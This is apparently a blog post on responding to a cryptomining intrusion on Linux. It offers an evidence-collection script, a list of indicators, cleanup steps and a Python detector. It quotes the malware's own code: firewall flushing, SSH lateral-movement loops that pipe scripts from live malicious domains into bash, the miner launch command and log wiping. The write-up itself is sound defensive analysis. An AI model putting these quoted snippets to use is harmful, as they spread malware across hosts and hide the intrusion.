Background
Some time ago I handled an emergency response and wrote it up in an article, Linux emergency response notes. In the past two days we have handled another virus intrusion. Building on the previous one, I wrote some automated scripts for this response, which improved the efficiency of the work to a certain extent, so I am making another set of notes.
PS: This article focuses on sharing emergency response experience. The malicious URLs are retained in the article, but the download paths of the malicious script and program have been removed. This article is only for technical discussion and analysis; any illegal use is strictly prohibited, and violators are responsible for the consequences.
Emergency operation notes
Looking back at my last Linux emergency response notes, I found that such a long list of commands is dazzling and inconvenient to operate. It is better to write a shell script that collects the information automatically.
Automated information collection
My automated information collection script is as follows. Its original purpose is to collect the information automatically without me having to connect to the customer's equipment, which improves operation and communication efficiency.
#!/bin/bash
# Automated evidence collection: every command writes into /tmp/GatherInfo so the
# customer only has to run the script and send back the resulting archive.
# Run as root from the directory that holds the chkrootkit and busybox binaries.
function initial(){
echo "Doing initial"
mkdir -p /tmp/GatherInfo
chmod +x ./chkrootkit
chmod +x ./busybox
}
function chkrootkit_info(){
echo "Doing chkrootkit"
./chkrootkit > /tmp/GatherInfo/chkrootkit.log 2>&1
}
function network_info(){
echo "Gathering network info"
netstat -tulnp > /tmp/GatherInfo/netstat_tulnp.log 2>&1
netstat -anp > /tmp/GatherInfo/netstat_anp.log 2>&1
}
function process_info(){
echo "Gathering process info"
ps aux > /tmp/GatherInfo/ps_aux.log 2>&1
ps auxef > /tmp/GatherInfo/ps_auxef.log 2>&1
# -b (batch mode) is required when top's output is redirected to a file
top -b -n 1 > /tmp/GatherInfo/top_n1.log 2>&1
}
function init_info(){
echo "Gathering init info"
chkconfig --list > /tmp/GatherInfo/chkconfig_list.log 2>&1
ls -alt /etc/init* > /tmp/GatherInfo/ls_alt_etc_init.log 2>&1
}
function cron_info(){
echo "Gathering cron info"
cat /etc/crontab > /tmp/GatherInfo/crontab.log 2>&1
cat /etc/anacrontab > /tmp/GatherInfo/anacrontab.log 2>&1
crontab -l > /tmp/GatherInfo/crontab_l.log 2>&1
# Absolute globs instead of "cd dir; cat *": if a directory is missing, a failed
# cd would otherwise make the following cat read whatever directory we are in.
cat /etc/cron.d/* > /tmp/GatherInfo/etc_cron.d.log 2>&1
cat /etc/cron.daily/* > /tmp/GatherInfo/etc_daily.log 2>&1
cat /etc/cron.hourly/* > /tmp/GatherInfo/etc_hourly.log 2>&1
cat /etc/cron.monthly/* > /tmp/GatherInfo/etc_monthly.log 2>&1
cat /etc/cron.weekly/* > /tmp/GatherInfo/etc_weekly.log 2>&1
# per-user crontabs: /var/spool/cron on RHEL-style, /var/spool/cron/crontabs on Debian-style systems
cat /var/spool/cron/* > /tmp/GatherInfo/var_spool_cron.log 2>&1
cat /var/spool/cron/crontabs/* >> /tmp/GatherInfo/var_spool_cron.log 2>&1
cat /var/spool/anacron/* > /tmp/GatherInfo/var_spool_anacron.log 2>&1
}
function other_info(){
echo "Gathering other info"
grep -v nologin /etc/passwd > /tmp/GatherInfo/passwd.log 2>&1
ls -alt /tmp > /tmp/GatherInfo/tmp.log 2>&1
ls -alt /var/tmp > /tmp/GatherInfo/var_tmp.log 2>&1
ls -alt /dev/shm > /tmp/GatherInfo/dev_shm.log 2>&1
echo "$LD_PRELOAD" > /tmp/GatherInfo/LD_PRELOAD.log 2>&1
cat /etc/ld.so.preload > /tmp/GatherInfo/etc_ld.so.preload.log 2>&1
ls -alt /root/.ssh > /tmp/GatherInfo/ls_alt_root_.ssh.log 2>&1
cat /root/.ssh/* > /tmp/GatherInfo/cat_root_.ssh.log 2>&1
for user in /home/*
do
if test -d "$user";then
# $user is the full path (/home/name): use only the name in the log file name,
# and brace the variable so "_.ssh" is not parsed as part of the variable name.
name=$(basename "$user")
ls -alt "$user/.ssh" > "/tmp/GatherInfo/ls_alt_home_${name}_.ssh.log" 2>&1
cat "$user"/.ssh/* > "/tmp/GatherInfo/cat_home_${name}_.ssh.log" 2>&1
fi
done
}
initial
chkrootkit_info
network_info
process_info
init_info
cron_info
other_info
cd /tmp
tar -zcvf GatherInfo.tar.gz GatherInfo
Analysis of information collection results
View the contents of all files under GatherInfo (the automatically collected information) and go through them one by one according to the items in the checklist below.
Emergency Response Checklist
No abnormality was found when investigating processes and the network. When checking the crontab scheduled tasks, three abnormal entries were found:
59 * * * * root (curl -fsSL http://t.amynx.com/ ......
28 * * * * root (curl -fsSL http://t.jdjdcjq.top/ ......
13 * * * * root ps aux|grep lplp.ackng.com ......
I fetched the malicious script locally. It is a shell script; let's analyze what it does.
Malicious script analysis
The malicious script has 439 lines of code. The first 300 lines delete files and kill processes; I will briefly summarize a few pieces of that code.
#/bin/bash
processes(){
killme() {
killall -9 chron-34e2fg;ps wx|awk '/34e|r\/v3|moy5|defunct/' | awk '{print $1}' | xargs kill -9 & > /dev/null &
}
killa() {
what=$1;ps auxw|awk "/$what/" |awk '!/awk/' | awk '{print $2}'|xargs kill -9&>/dev/null&
}
killa 34e2fg
killme
killall \.Historys
killall \.sshd
killall neptune
killall xm64
killall xm32
killall xmrig
killall \.xmrig
killall suppoieup
# sshd
ps ax | grep sshd | grep -v grep | awk '{print $1}' > /tmp/ssdpid
while read sshdpid
do
if [ $(echo $(ps -p $sshdpid -o %cpu | grep -v \%CPU) | sed -e 's/\.[0-9]*//g') -ge 60 ]
then
kill $sshdpid
fi
done < /tmp/ssdpid
rm -f /tmp/ssdpid
# Removing miners by known path IOC
files(){
ulimit -n 65535
rm -rf /var/log/syslog
chattr -iua /tmp/
chattr -iua /var/tmp/
chattr -R -i /var/spool/cron
chattr -i /etc/crontab
ufw disable
iptables -F
echo "nope" >/tmp/log_rot
sudo sysctl kernel.nmi_watchdog=0
echo '0' >/proc/sys/kernel/nmi_watchdog
echo 'kernel.nmi_watchdog=0' >>/etc/sysctl.conf
rm /tmp/.cron
rm /tmp/.main
rm /tmp/.yam* -rf
rm -f /tmp/irq
# Killing and blocking miners by network related IOC
network(){
# Kill by known ports/IPs
netstat -anp | grep 69.28.55.86:443 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep 185.71.65.238 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
files
processes
network
echo "DONE"
Next it downloads malicious binary programs and spreads laterally via SSH.
Code snippet 1
if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then
for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h 'export src=sshcopy;(curl -fsSL http://t.amynx.com/ ......
fi
Code snippet 2
for file in /home/*
do
if test -d $file; then
if [ -f $file/.ssh/known_hosts ] && [ -f $file/.ssh/id_rsa.pub ]; then
for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" $file/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h 'export src=sshcopy;(curl -fsSL http://t.amynx.com/ ...... |bash >/dev/null 2>&1 &' & done
fi
fi
done
Code snippet 3
for user in $userlist; do
for host in $hostlist; do
for key in $keylist; do
for sshp in $sshports; do
i=$((i+1))
if [ "${i}" -eq "20" ]; then
sleep 20
ps wx | grep "ssh -o" | awk '{print $1}' | xargs kill -9 &>/dev/null &
i=0
fi
#Wait 20 seconds after every 20 attempts and clean up hanging processes
chmod +r $key
chmod 400 $key
echo "$user@$host $key $sshp"
ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=5 -i $key $user@$host -p$sshp "export src=sshcopy;(curl -fsSL http://t.amynx.com/ ...... |bash >/dev/null 2>&1 &"
done
done
done
done
The above three pieces of code spread laterally through SSH key-based login.
if [ ! -d "/.Xll" ];then
mkdir /.Xll
fi
cd /.Xll
if [ ! -f "./xr" ];then
uname -a|grep x86_64 && (curl -fsSL d.ackng.com/ ......
fi
uname -a|grep x86_64 && ps aux|grep lplp.ackng.com |grep -v grep || ./xr -o lplp.ackng.com:444 --opencl --donate-level=1 --nicehash -B --http-host=0.0.0.0 --http-port=65529
The above code downloads a malicious binary program, which should be the mining virus body itself.
Finally, it cleans up its traces:
history -c
echo 0>/var/spool/mail/root
echo 0>/var/log/wtmp
echo 0>/var/log/secure
echo 0>/var/log/cron
echo > /root/.bash_history
Clean up and restore
According to the logic of the malicious script, the cleanup steps are as follows:
1. Delete the malicious crontab scheduled tasks
2. Kill the ./xr process
3. Delete the /.Xll directory
Summary and reflection
Virus identification
Directory and file: /.Xll and /.Xll/xr
Process indicator: ps aux | grep lplp.ackng.com
Two domains: t.amynx.com, t.jdjdcjq.top
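A small triage helper, added here as an example (it is not part of the original post or of the toolbox repository): it scans the crontab and ps output collected by the script above for the indicators summarized in this section, that is cron entries that fetch a remote script and pipe it into a shell or name one of the domains, and any process running ./xr or carrying the lplp.ackng.com pool argument. The sample crontab and ps lines are constructed to mirror the findings on this page.

```python
import re
from typing import List

# Indicators taken from the analysis on this page.
MALICIOUS_DOMAINS = ("t.amynx.com", "t.jdjdcjq.top", "lplp.ackng.com", "d.ackng.com")
# Generic form of the three cron entries: fetch a remote script, pipe it into a shell.
CRON_DOWNLOAD_EXEC = re.compile(r"\b(curl|wget)\b[^#\n]*\|\s*(ba)?sh\b")
# The miner binary run from the hidden directory, or its pool address on the command line.
PROC_INDICATOR = re.compile(r"(/\.Xll/|(^|\s)\./xr\s|lplp\.ackng\.com)")


def triage_cron(text: str) -> List[str]:
    """Return crontab lines that download-and-execute or name a known domain."""
    hits = []
    for line in text.splitlines():
        s = line.strip()
        if not s or s.startswith("#"):
            continue  # blank lines and comments cannot execute
        if CRON_DOWNLOAD_EXEC.search(s) or any(d in s for d in MALICIOUS_DOMAINS):
            hits.append(s)
    return hits


def triage_ps(text: str) -> List[str]:
    """Return ps output lines matching the miner indicators, ignoring a grep for them."""
    return [l.strip() for l in text.splitlines()
            if PROC_INDICATOR.search(l) and " grep " not in l]


# Constructed sample data mirroring the entries found on this page; the removed
# download paths are left as "......" exactly as the post shows them.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
0 2 * * * root /usr/sbin/logrotate /etc/logrotate.conf
59 * * * * root (curl -fsSL http://t.amynx.com/ ......
28 * * * * root (curl -fsSL http://t.jdjdcjq.top/ ......
13 * * * * root ps aux|grep lplp.ackng.com ......
"""
SAMPLE_PS = """\
USER PID %CPU %MEM COMMAND
root 1 0.0 0.1 /sbin/init
root 2391 98.7 1.4 ./xr -o lplp.ackng.com:444 --opencl --donate-level=1 --nicehash -B --http-host=0.0.0.0 --http-port=65529
root 2410 0.0 0.0 grep lplp.ackng.com
"""

if __name__ == "__main__":
    # In practice read /tmp/GatherInfo/crontab.log, etc_cron.d.log and ps_aux.log here.
    for hit in triage_cron(SAMPLE_CRONTAB) + triage_ps(SAMPLE_PS):
        print("SUSPICIOUS:", hit)
```

Run it over the files in the GatherInfo archive after unpacking; each flagged line maps directly to one of the three cleanup steps above.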
Mining is less of a threat than ransomware
Every time I encounter a virus intrusion I panic. A mining virus is okay: the worst case is reinstalling the environment, and the customer's data is safe. If it is ransomware, it is very difficult.
In any case, try to ensure system security and reduce the attack surface of the system; this goes a long way toward keeping the system from being invaded.
Protection advice
Generally speaking, automated intrusions use very simple weaknesses, such as weak passwords, vulnerable components, unauthorized access, and so on. Another infection path is SSH key authentication: as shown above, the script has three methods of SSH lateral movement, and this approach still seems very popular. Therefore, operators still need to properly control SSH key-based login.
Finally, I have put the scripts and checklist used above at https://github.com/kafroc/emergency-response-toolbox ; readers who need them can download and use them, and any feedback is welcome.